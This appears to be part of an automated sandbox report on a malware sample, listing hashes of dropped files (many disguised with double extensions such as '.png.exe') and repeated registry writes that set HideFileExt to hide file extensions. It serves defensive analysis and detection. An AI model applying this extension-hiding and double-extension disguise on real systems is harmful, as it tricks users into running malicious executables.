C:\Users\Admin\AppData\Local\Temp\kMEE.exe
| MD5 | 43372b145855ee0eb03e18a3625a990f |
| SHA1 | e116a59a44d9eb5850e5b730b47880e6b43f3e68 |
| SHA256 | 4fdaa994dd6d0ce54ae86b4edb24750c2e9d86c9bb9c7f596bc3e0c027dd9d71 |
| SHA512 | 5cdc3b75c05851d8ddf6d783582ac16780fb67f56476f216bb60bbcace74cf12dacc9de28fa3202aae8a15a4749d5766192658ee50a22649fdd50f63dde18640 |
C:\Users\Admin\AppData\Local\Temp\kscO.exe
| MD5 | 6a7ad2550ce592c836550b1bdd2d526e |
| SHA1 | 113e7725c64ed2b8b24a2964e9eeadcc02c214c7 |
| SHA256 | 6d1d5e6cff6b93be464606ab40b4742e642a3b5d895d662c4bb641b4be03f012 |
| SHA512 | 4f43a49a7c63d19a16537343cdf1e2814dc1922ae553270ae4de4ac3cd9defcc74c8018482f4a6067fc62506d92a87bc3081f97aa135c4ab8eb8109654ea59ca |
C:\Users\Admin\AppData\Local\Temp\UEEY.exe
| MD5 | 0988f8f6ccdd2039d0314256b0f35cab |
| SHA1 | 4f5ade3600b2fc514f497cdf4fd0e1d76fc4ede4 |
| SHA256 | e55390a9fc3a7d3fc931607bb9042d0641e982d0e38164164c97dc0b32128d13 |
| SHA512 | 3a5b81e0927aa42101bc8e908e923a68971bdf536679cd5dee19f8e71f4dbf07b760b2c744f7b7fba51f7a85eb5cc71b8c836d24ce7abb335bdd7dbe01264fbb |
C:\Users\Admin\AppData\Local\Temp\Ioky.exe
| MD5 | 140e815dadef3800d726db33603b100c |
| SHA1 | de2e352ddb6e5488fa77eead103bddf3e67cd082 |
| SHA256 | 19e5633ba8a153daa9779cd8d09639fadd2a9c3cd5ea97faa54248652d9fbe9a |
| SHA512 | ff6822682c8f3f4b586a65e36293669c9c0904253590a79014714a2e76bdf27c9343b7fe0513f0267bde7b082eef4dc93702fc9e96155bb24ee0038952fd2578 |
C:\Users\Admin\AppData\Local\Temp\Osce.exe
| MD5 | 3bc7d1ad696875a86dc6af98ecbb98bf |
| SHA1 | d97526b816ef4c211d4207c9eb41d41fa150169f |
| SHA256 | 0279bfcc47996520712d12c78ee731d67c5920fc7007b273ca4994924dd28b7a |
| SHA512 | 38738787997e21640b6dfc81327f0c96eae0d0f3aa0c3c2b4b48dc3e43e59c7fdae7528e96a42ccbff7a9811dc747b129d84a5611a5f296ad51f0bd28d007626 |
C:\Users\Admin\AppData\Local\Temp\IAAc.exe
| MD5 | 5fe810cebcc536468c0b1965162d6939 |
| SHA1 | 3aa393f116cfdaf3742fce3407e6885857cb7790 |
| SHA256 | d2b6ca23687f506ea60c881e3b1d22a34b733a6b4c8b5c85923c7748129ba2af |
| SHA512 | 882d4cf362475b7ef33dc74ea3738de587fcc11586fd2480459ded72ab7fe5a09edfb27020c21d517d160a5efa385a9eb92cc56fcdb9fb539a939a02ef4ee836 |
C:\Users\Admin\AppData\Local\Temp\YgUq.exe
| MD5 | e4c4e37beaddef394c3fd25fdc48ffd1 |
| SHA1 | b0a06409a15c3a710b626121a4eeae9cab301310 |
| SHA256 | 37c456100c0177d1baab7eb72ca4cc183d117fc3ca1716e1ffaef5a129e10cae |
| SHA512 | 54c75fb1fcec2ab467cde8fe12ef84ad6ba94fcd503cc07735b58ca7a05d55818b40497c38715ce930a35f2dbea3cede1f2df434daa5c8153d5b321d8db6069c |
C:\Users\Admin\AppData\Local\Temp\mIUG.exe
| MD5 | dec5fd22737e8332670d4d12ece8e208 |
| SHA1 | a4f1dacebd42e7a5423317c6edbd1f7107657b23 |
| SHA256 | ec43847a00b9e18dfbad4fd28f4dca12420d6208495c6d00a2f7a96650ab4ffe |
| SHA512 | 19664e3c0b3e2b4033fe3ec6bc6130a7d81b65f09d5521e8f1388cec01165801b61cc064741e06deac6996936700518df00653e521b65d40be690b831b949ef2 |
C:\Users\Admin\AppData\Local\Temp\gIQM.exe
| MD5 | 4d334745600a4b79bb1236ac6c1bb33e |
| SHA1 | d8b8977b80707b8400929043a9279eda9e0c8699 |
| SHA256 | 41f3eca59cdcdace59c3dab40ce3ac675bb05bcd1ced6356e6311523cc13f812 |
| SHA512 | c735855504fb1761b94011dc9e24f09fe5991241f1380fa8f900e654e36f3302ced54cf856edacfd9622496b018553c76b361bad9f76458635ec6c937546d00a |
C:\Users\Admin\AppData\Local\Temp\WcwY.exe
| MD5 | fb767a2d14534fc369b9eeee970c25e7 |
| SHA1 | 5fbef16cefaafdd00792c69ce332ceab24d6a43b |
| SHA256 | 31eb36ec8a816d707fdc849c9a8cad4c5667dcad6af3dcef92ba99a88fccfd86 |
| SHA512 | 5b0c6b8a7f8b91dc6d903c48f2d63b12e8201681870caa60a4daceea8cc6c44ff1dc4a7af4281ff89ae4f0e6738cde4e949d8d144798134d607cbfddce55f747 |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\OneDriveLogo.png.exe
| MD5 | 374d512060e9a8a7eefe29369c988ce9 |
| SHA1 | 27f22ab61e8070ff83dc173633d630465671f64a |
| SHA256 | 0094c5fa7d796daeafd97ef845f0f02bc09d972d2db3ca0bc7f6a69dfb4b7d65 |
| SHA512 | 109898f94286cc86682946e7a83cd743a1408b1d32cde96cce45547a8513648631fd31960d25c45249a275cf185e3f2bc36b0777820141e4a658e062a85618d4 |
C:\Users\Admin\AppData\Local\Temp\kcYK.exe
| MD5 | 6ed951725f88f682b7ece30f1177ff9b |
| SHA1 | d6b28727fd3bf5302984d96ee916d262e8b144c5 |
| SHA256 | 472f88e339d6cedfc13ea0070403bf0f8cfe54b976ca8a6ddd72c1dc78b8051d |
| SHA512 | f82203f0a16d37cfe93e58096000b91efa0614bb1963367e385d00c85d46bc5e2e0214faa63ab82430a9defade248dece72b3c38c3184d364a1deaf9d670990c |
C:\Users\Admin\AppData\Local\Temp\asMw.exe
| MD5 | 8213effa3ab485ad448aa82666e3864b |
| SHA1 | 9cd0001087486bc46b40fb7746d61bfaf77ff64f |
| SHA256 | 0b7b3acaa88c6b1e29c34da7993723540a098536ad553048545bbcc216766e39 |
| SHA512 | f2e5da37b5b758a763f0e7515292f77c08cd607fb6610fccfb12152c27c327e43545d6341f62ac44d1d4735c369b41dc1f64c350f9e2b4a0baedb6e406d9171d |
C:\Users\Admin\AppData\Local\Temp\cMAW.exe
| MD5 | f5ce64e295ba17aac286bf5cc584a189 |
| SHA1 | 0b7ff06d68f74d5c7083395af9e9273a864df126 |
| SHA256 | 19199c53f23f0505fd243f9eadeae8b10852e4d8f94e49d11f52566ef51d730d |
| SHA512 | 04c7d2aa2d6cc14917f85ff1808fdfc208de57feb7160b65969296c5065f66515c77799b85d9dd4e45fe4be57ce1e61692ce5c54deb67364e053731b91f75174 |
C:\Users\Admin\AppData\Local\Temp\ugIW.ico
| MD5 | f31b7f660ecbc5e170657187cedd7942 |
| SHA1 | 42f5efe966968c2b1f92fadd7c85863956014fb4 |
| SHA256 | 684e75b6fdb9a7203e03c630a66a3710ace32aa78581311ba38e3f26737feae6 |
| SHA512 | 62787378cea556d2f13cd567ae8407a596139943af4405e8def302d62f64e19edb258dce44429162ac78b7cfc2260915c93ff6b114b0f910d8d64bf61bdd0462 |
C:\Users\Admin\AppData\Local\Temp\KMse.exe
| MD5 | e32171f09363a0d370b9d5f25313873e |
| SHA1 | f9d53136eee7c883a4dfa84a6174b7cc9d02c36a |
| SHA256 | e943daa089fc888ebfc3d05d432dd38d1d51c8188773c1da2acb01142d056313 |
| SHA512 | 05ce578233369e35f0a07bb83ad23e659089e0332738d698a037fe06a30d300dce6d0dec5b32f2fd2f0d2f7686baf72c621b887595c980d7675b7cdcb6f4c6f7 |
C:\Users\Admin\AppData\Local\Temp\YAAk.exe
| MD5 | b6e1beb8a32c1a3f4d3e93b589ff4eae |
| SHA1 | 803196f5fc2d1b1576973574a22b9a2621dcf881 |
| SHA256 | 65197ad81ba150eb90c3592d5508ab267ccb2e4fbd1c8e94194c0e044c69b2c5 |
| SHA512 | cde5a45c3531afda1eca6d3ebc101df8ec721d03047195885431739a72e77d6fafa4fa60d15280792346ad7a2b438f513086a245b399e05bb2f36f9db996ee38 |
C:\Users\Admin\AppData\Local\Temp\mEUu.exe
| MD5 | 852e2148c684a5dac14ec7b04b6c82f1 |
| SHA1 | 9ba97d55e28e27ff0497c8b2a67ab04fe4747f4a |
| SHA256 | 793308a7db25d99a95f11659e2cadd887571fc002768ce600f93e52e9a392317 |
| SHA512 | 010ab6125f0e60023c3da4073a75ca7864166fade9e06aaed85298bcd2f7d5ee9ce1272cd7a92ad980fb314d7fdafd03ff84a17d1b25ed27d649e5a19c44cb3f |
C:\Users\Admin\AppData\Local\Temp\aQMS.exe
| MD5 | ddfbd05b3e693524f6186272d246ccea |
| SHA1 | bd7540caa9bbc5f400a542d8ebe6c95086e4910f |
| SHA256 | c53236fa3523963a6ec66e40e7955d17564d69cefca658199459aec95c5577bb |
| SHA512 | e91733fce94afa4b88451d0ef5f76316769185459e307877a5b2d383675ee26943b41e64dfc4fae2e4822203ed6eb5c1ce5282f1a72e41c6cfe49fd532d3441f |
C:\Users\Admin\AppData\Local\Temp\WAUu.exe
| MD5 | bc33b13946fb892bf67dd4d1eb3f5358 |
| SHA1 | 1b08ad79c2a480f57e8a0f0165ece52862e39198 |
| SHA256 | 715d4e82cb2df1aa6922d0224ab54abf7dc2e0de2a5ba891f593db1129b45a90 |
| SHA512 | 4714a65a23fbec3bc5bbe5eedc284d82763c3c7d4df9bf323a43bd5a94f55ba1e2dbe2a6f5af4653be43190e65d7d63b407660ad36fe61db80bbd4b7e2406ae9 |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-black_scale-400.png.exe
| MD5 | eec9a6a042653c3eca9d026f4c73d36c |
| SHA1 | 7611bd8c9fdafa77329f358dc68e687d88650596 |
| SHA256 | ecb7cf2ad839beeec5dc1f6c10df5b3787219cde876209c1eee8750faa70f67e |
| SHA512 | 6da8011e9c056715143cb33a5ada16484eb8daeaaee6a500e7f9d711b85010934b73cb8544a7420fd477a9d166b2759f058d5197a768c2674f3703cbeac0ac9d |
C:\Users\Admin\AppData\Local\Temp\eUAw.exe
| MD5 | 7c0ee51cd13e257d9405f3e138e353ed |
| SHA1 | 0b5344e7e8665b6ed1791b7fd2508fee517ecd2a |
| SHA256 | 5db348f96e49b5191cb27377c9ae3a4d3fb42d995f8c3800fe17f7feffb62ed8 |
| SHA512 | 64b629875250b1ebfbb8f6f6896f2b95aa6c92be0d0059a3fed1e22ae86b7e6d1ae8869af93eef8ffd31773e88c28a3f653f0004583afd7d3a4bb53400cc0b2e |
C:\Users\Admin\AppData\Local\Temp\OMsM.exe
| MD5 | dc9f972d767103f9b6baf5f4d2fb70d7 |
| SHA1 | a21196d45cd39c46044a93dca72f2a9a6dd92bec |
| SHA256 | 0ea752d70af4a6208072e984e1fad6062524eb329e758344ae02807ab093a386 |
| SHA512 | 1d68fd7959c80e8cfc57fe6b6f6044dd13a1f93a1edc75083ad13868649c79790c9a2e522cdfdb123e95a12411e81ec848ab423f6d87bd1794fc9154eba68e67 |
C:\Users\Admin\AppData\Local\Temp\Scoi.exe
| MD5 | 753b026e7e772f3864243ce24f805eab |
| SHA1 | 2b696b18b1abf7ca3575f8fcb7ebf31e6f8f5bb1 |
| SHA256 | 00d90a1267e188bad129caef2fa54b27d680d5554375fd742881a76c7167c8f6 |
| SHA512 | 178dc6e559e01fbf7c2da4ee5673f94c59803a174910f42383afaa619c950175ee8c8f7608592c0f86a7ab13e8cc06878e8aab814cba84a65a6fa21f834ef770 |
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\26310719480\squaretile.png.exe
| MD5 | f8c6a7a0b3989db184b85e0030dc57e4 |
| SHA1 | a121dd2e4423e4e29ed750e8cdc54475fd532809 |
| SHA256 | 61bf43a8bc0c171d36fa5c9f9f93811000c1d8ada99424beb095fcbb417122c7 |
| SHA512 | f02551350451b7af217c17f66c3a1f8546c3187b81b2787fa7e593dc3973e5953d9225afde36b7aa70b30c1eeea947ccac3fcbe6f012dd97c503dddf365079a2 |
C:\Users\Admin\AppData\Local\Temp\UkEQ.exe
| MD5 | 875e9bc17031e50687ca6893b3b165fb |
| SHA1 | 9d968fc58f55b93e6f2f0bab16a911c62e5f3746 |
| SHA256 | 5b9a3cab43f976b6a0cf8a9277feee1a4d82207508d3f8df88701c85e86ff17f |
| SHA512 | c721130ecae708f0cc04595ec7d1a25a82865c55b03862c665c5c9476e4a879af6ee2006d7b05931cb7b6a1671cc77b3407de65be7bd596d8375f241640b5c90 |
C:\Users\Admin\AppData\Local\Temp\wQUw.exe
| MD5 | a3bbe9a8a25f48d54c4295c37e38a6cd |
| SHA1 | 11ebd4cb0e27225f7eb5729462349285953b201b |
| SHA256 | afe0dbf65625b6b31d54e975d8f8af1a81b1ef889a55f0618f46bdec15141969 |
| SHA512 | 3fa84465d055cf5312f74f0da2a62c8a01bc43c354f317d7a86cc877870da263ec1403c78059582ed9c9a8ed9f5b685435a3b5549c3c437bd97fc2a33540443b |
C:\Users\Admin\AppData\Local\Temp\AEQK.exe
| MD5 | f85575f90117d3378e078918bf81ea3c |
| SHA1 | e42a27c69609c910dcd12e9aae4c736aa06979aa |
| SHA256 | b37929a84fbc4264dd4b2b3cd664c091bfade547ccf4b1eb7ed96234105e9ce3 |
| SHA512 | 02969f4742caaac84372361c20f1dccc5b85b04b8b891bd502b9ebb6c1ca18f24b487628549a13da84378a559dd32a5a64e68be336ebbf40e77c3a0574b0a1ed |
C:\Users\Admin\AppData\Local\Temp\GwsA.exe
| MD5 | 3fc2b7e8e10d469b955203eb2644d8d6 |
| SHA1 | 49e6799426d9a98f093d03abecc02bfd15a40588 |
| SHA256 | 4c29f364c067a2e15478755bd128c24ebe077774a490b6d0b7d7caa6ed57ade9 |
| SHA512 | 91b4826d76be81aa18a00daa26d7674b89f0dae1a4cc773ed1f1e339df5ef44738ef132f665b615c594c71e748eb06e5cae6a69fab7c33078d8a4b0aadc80c7c |
C:\Users\Admin\AppData\Local\Temp\YEMq.exe
| MD5 | 6060a3f22eeb9f4c8c303731d32528b2 |
| SHA1 | 851d1010d38f20392ae8775693c5e281b122355c |
| SHA256 | 2815a212713d869e3e31e3e4e7578fc8fb84a6075702b5a35da4a4261049eb96 |
| SHA512 | 6af151f1dbbf42578dd73af36acf5fb07f6f6ccef06dc4377351c549b70d9d44329790ff0cd9cd0c0d8dfcf21b3992a5b2fb8bc8554def0b160483ae8b9d9075 |
C:\Users\Admin\AppData\Local\Temp\YEUk.exe
| MD5 | 23b9eaf119f9fb8aba5b3305b817a251 |
| SHA1 | 1a227aa6f560b10809551df97fc605f72f84e3e1 |
| SHA256 | 2a54fe8ba9c6fe4ac7b456b6aa9eb4b2995ac8fe20225993aed82d9c0e7f3faa |
| SHA512 | eaf0bbbd1c60bc58e3a4f95e4ea16d93dfd2af617d4e81a6b1c48daba165375bc43c70bc49b3754046ab607705ae245e661dc647ff3166a2706d9fe4720b7a5b |
C:\Users\Admin\AppData\Local\Temp\yUsI.exe
| MD5 | 628c53712c813e69ca808cdf07c56523 |
| SHA1 | 8c2276a995da203ab8c24f55b2467c31490c69e1 |
| SHA256 | e2de2536a8d233812cfd8bc28384b83551883566cee183dacda14c95cef5305c |
| SHA512 | 3dc98c807868804b98290cb0532fc89c74eab38cf092925a67062282bba2981ba9e92aa0672b28279f09c9122a14d7f47afd75f0c1182f33540d96b76bd148d2 |
C:\Users\Admin\AppData\Local\Temp\Mcwg.ico
| MD5 | d07076334c046eb9c4fdf5ec067b2f99 |
| SHA1 | 5d411403fed6aec47f892c4eaa1bafcde56c4ea9 |
| SHA256 | a3bab202df49acbe84fbe663b6403ed3a44f5fc963fd99081e3f769db6cecc86 |
| SHA512 | 2315de6a3b973fdf0c4b4e88217cc5df6efac0c672525ea96d64abf1e6ea22d7f27a89828863c1546eec999e04c80c4177b440ad0505b218092c40cee0e2f2bd |
C:\Users\Admin\AppData\Local\Temp\gskE.exe
| MD5 | 47c62f0ad46cda5fc2d42ea1d028a03b |
| SHA1 | 73cb19148a761ea1c56f9da150f94a958f6972a5 |
| SHA256 | a6193d20e4c9d78b236592a4f30cde1889a7ced5f676b40e5dd74dfdf9ed96f7 |
| SHA512 | a3e25da1b1faae74f9992f77b42a698f63ca54d72a8ae1126b065d76b5ba9c57707f4b6826c2181e98ccf361021c6a852e18bafa984b8000eeef91b7031dddb1 |
C:\Users\Admin\AppData\Local\Temp\UYUI.exe
| MD5 | 7d944e057e5febfeaa007c8589827994 |
| SHA1 | 7e22f1f92cf2902b082fe2dcdbcc8398ac207242 |
| SHA256 | 9c997ac31e2f550dc48f120c33100d83595362e5962387afb34c1aad1f3669ac |
| SHA512 | ec1f11580b7a670cb95f7876d385ff29ab8a261551bca78bd76fce86a95d0c5129ff33ea6f4a683d00ece6a53ba39deccf2bc5f85a1e57d6622ef9b05353b3b9 |
C:\Users\Admin\AppData\Local\Temp\oUog.exe
| MD5 | acba67e11a7279af2c0da43ba4189c9b |
| SHA1 | da3d90a00b3861f634436d7bf203b5a3489e0a52 |
| SHA256 | 4b3f450ac89da53d897c49237775e9446903a296b639b699a204e0cc425eb0ff |
| SHA512 | d90de1118caa61001bcf45589cdced2dc011ce11682e176678771083e0299b474dab9484f6ea9625787a782b3420e957efebaf3f38d26496ce4525841e916946 |
C:\Users\Admin\AppData\Local\Temp\UQMa.exe
| MD5 | 3b8f72f1c730a1ba4ad40bb50510fdbe |
| SHA1 | 4138fe80b57565fa91b898339ade13da4f4ea664 |
| SHA256 | 739e6f5e57f436b6431540c018fa663b390a525f5443a05592a34c06a646f012 |
| SHA512 | 0d860d4ad221c1e99a6536190c1badfbd366c12047a9dc2d8c1ac76d9926cc34de1fa592fe559a572ac0374939e42ec763019f1b837c7c36a04e8f4e6c02eef6 |
C:\Users\Admin\AppData\Local\Temp\cIAq.exe
| MD5 | ad59cc7a06c28ae4b23b3650acfea731 |
| SHA1 | e744358b35cba4da80f6d6246833e080fc859731 |
| SHA256 | b050f15724a91a738dd39a50f02e7731027cfa6b7977f4c777512f99a9c150be |
| SHA512 | 48be1ed20bb9d3a24b9f12a56f100eaaf33bc581e803dc2ab24b9e427f6ddd7338e3c3f39388558d5bb89da806e97221204df966bf9745a2defbc36ff6b59b4b |
C:\Users\Admin\AppData\Local\Temp\OMYs.exe
| MD5 | 1571420f4b6e24091ba67ffc264abc82 |
| SHA1 | bde946b460fb840a87c576b1eaabd49a1576fb06 |
| SHA256 | e093e6a2783eb3d5115b2cb15ba3faafc68eb0fc4517ea454aa288b207928c00 |
| SHA512 | dc8cc55e90d09dfde5036ba47594d6885120371543842ddbc47fd142ad4615dc2ffb59b614884b1bc48ca8a3ac4ab905d6ee981ce06613b506aa922f5da32d5f |
C:\Users\Admin\AppData\Local\Temp\eEIq.exe
| MD5 | b16cfc93c6237bdacb5085f2e96b9535 |
| SHA1 | 6fcd178cc2ade4e79b00be5ee88e832475470c95 |
| SHA256 | 19bc392d6fd9f13140845e54e53e0aef23dcc31312ee93d2715071f8f85dbd95 |
| SHA512 | b4b6db80e4d4786735ccff8e57c129a63df764217ae652dd6128dfcf673c83934c0e4941f6854ebeb47cd68ea4efeb80337260f6b6ba945a39c11fdec7ce3e59 |
C:\Users\Admin\AppData\Local\Temp\qQkM.ico
| MD5 | ace522945d3d0ff3b6d96abef56e1427 |
| SHA1 | d71140c9657fd1b0d6e4ab8484b6cfe544616201 |
| SHA256 | daa05353be57bb7c4de23a63af8aac3f0c45fba8c1b40acac53e33240fbc25cd |
| SHA512 | 8e9c55fa909ff0222024218ff334fd6f3115eccc05c7224f8c63aa9e6f765ff4e90c43f26a7d8855a8a3c9b4183bd9919cb854b448c4055e9b98acef1186d83e |
C:\Users\Admin\Music\PushUndo.jpg.exe
| MD5 | 1be305100b1cc29b75e32d6d854d7757 |
| SHA1 | c30411f593df8de5887aa6d5c31c81de05e9831b |
| SHA256 | 81e62785d20ffd42c8dd0d6427e57e5795934e5cc7f942acca04f6e388a3656d |
| SHA512 | d944197014dc7aee0da359280550a4d9c01518df350c381f3c8487b1b8102ef4e6f3861664bf1f8248e12a24a41b6138990910487be6c1c5fcd8e1ddf2296d47 |
C:\Users\Admin\AppData\Local\Temp\AQUU.exe
| MD5 | 98740b395238ab362430da0db46d3b09 |
| SHA1 | 83243ff115ba7b91ae2f1dbffc4c17672ba6e705 |
| SHA256 | 20b1d28f848569415d2c4b2761bdfc5ec6e5f6fa1c0735abac16364ae00f2ee7 |
| SHA512 | 17bbca6cc1589880efffcffe981b1baa87b83376c9fa0916f78a9191a2221ebb20b16a99e9f85b9a03be525418974f144197b897b69d427a6ff93bf4291e6b26 |
C:\Users\Admin\AppData\Local\Temp\kEkc.exe
| MD5 | 6693ffbb46feb0f51bbd4d261d02c333 |
| SHA1 | 87b01f8561396ce8178035e5ff52510114a2cc37 |
| SHA256 | 09cdefd5d4812aac0e93c938922725e931ef5c3bf8ffff117d15d8e80f75b6e3 |
| SHA512 | a31ff6d77157fadfc380e9c88cebf7e8d4b478f7eb177a08b793bd8652990e2faf29876fa5e6f1c2d209166073bbc170c5d9835d412f2928d160b945b92de78b |
C:\Users\Admin\AppData\Local\Temp\cMwa.exe
| MD5 | ab567caf589dda9cd4c7646dcc089c33 |
| SHA1 | a45759b50ad611ea0827e11843c95ae37254b9e9 |
| SHA256 | 0606ba6a749701676b89ea69e2af51d69042790e998932c2797afe70c1da4c74 |
| SHA512 | 9c8ac2073a918570f38a954937851f1686aabe080394d6670d1ae9605add5a234709ad7f616afe7645e9053b75095362510502062eb3ffcd1a06f6ec6bb95cac |
C:\Users\Admin\AppData\Local\Temp\IcgC.exe
| MD5 | edf4e60b5bcb9e23a9f3c445c8412c7f |
| SHA1 | c364b6ee4587f51edcebf922850015e9cafdf908 |
| SHA256 | dab6a21da0afab0b09490e95e3d1ba914fe87cd58d70de4870cb2f77b68cb435 |
| SHA512 | 3554db7bec98ea4f3fb69220d34919cca9d5f0400028e15bb7531b34a22f9d4637cdecea8ff6da5a29ed8ebfcd2fc3d9db8f30574ddf9cf91cebffcbc6a4847d |
C:\Users\Admin\AppData\Local\Temp\UQgK.exe
| MD5 | e7201951aec6fc040b154614bcc8dfd7 |
| SHA1 | 14fe435d5ed4e8da87336a7b1028510be47ae90a |
| SHA256 | 8d96e4152b1b1f4c79da8736a80eb8999ccf2ecf55ee559e1ca8c7a8f1acc175 |
| SHA512 | 555c1d62b2999fc0c9af3c146029963af5d2461a1d7e5d1ff4d6e1c116b646f90a67a8680989975b8c630e7cba4dec36f6daf45bd58490ea0241a7218dc32220 |
C:\Users\Admin\AppData\Local\Temp\KgEu.exe
| MD5 | 316296104ba129850affe2d5d84eddfa |
| SHA1 | e5abfb7f7067ffcea71ab376385ae134ca5cbc7a |
| SHA256 | 39e96216814f7778949146a8ced50faec873e3f2c80e9743acb0f668211ff2da |
| SHA512 | cea02ca425b4508dac71536c2ac8a872138c7abbf328cce0a72b95b3c658560cb57fe4661af275be05efde22f26e6f9c7eb7e1012271978c05e32755cd6173eb |
C:\Users\Admin\AppData\Local\Temp\AAAm.exe
| MD5 | 52c280d2e51b63d379c3fbf85e9d3ef7 |
| SHA1 | b596012620488aefd954ea60b89b69e9bd3611d9 |
| SHA256 | 3ac168601af2f1ae4fe4e8a598763428f1991fef830fb96d48b75f1762603409 |
| SHA512 | 03035b3630102b6c4b0927187decfd98c2c4dd0719aacf13cfac7ccf052537afd21baaeaa141af05b486ac0f79451ab01683933271ed663a176dedb34d17c31e |
C:\Users\Admin\AppData\Local\Temp\SEYa.exe
| MD5 | cc71c17e62ae5c594203ce5a1c8317ed |
| SHA1 | ad6d32a53b78350a4d73a117a92e4d8ed66e2ee3 |
| SHA256 | 292b4ad9ada9242bc6d466794e17a5e86271c7929d8e42c3d9631f89ed05ab7d |
| SHA512 | def7655e3bfaf2d7e392bf328ec123a8b655c4a5bb000680869b3bcdb3a815836d0105732524775b8b555a7f2530baf7b228bff36b76a43a865beca64fa2242f |
C:\Users\Admin\AppData\Local\Temp\iccY.exe
| MD5 | ff208bb32b4fb71cd32ada02e1c91d73 |
| SHA1 | 317f9c416bdc4e8237abea1ab51452e79289dea5 |
| SHA256 | 6799ab99999fd3c723757c5b860c3dd1bd9277e98764aef2eade29756ed78021 |
| SHA512 | 366383f2681f0da54bd8ad4c0f8c8eaefff03623079c44b5925ccfad93ac932af570025cc33976edf7c8962f852ce520c0dc6d8e9c70a7760eeabf7d109fa40d |
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-20 22:31
Reported
2024-10-20 22:33
Platform
win7-20240903-en
Max time kernel
120s
Max time network
119s
Command Line
Signatures
Modifies visibility of file extensions in Explorer
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
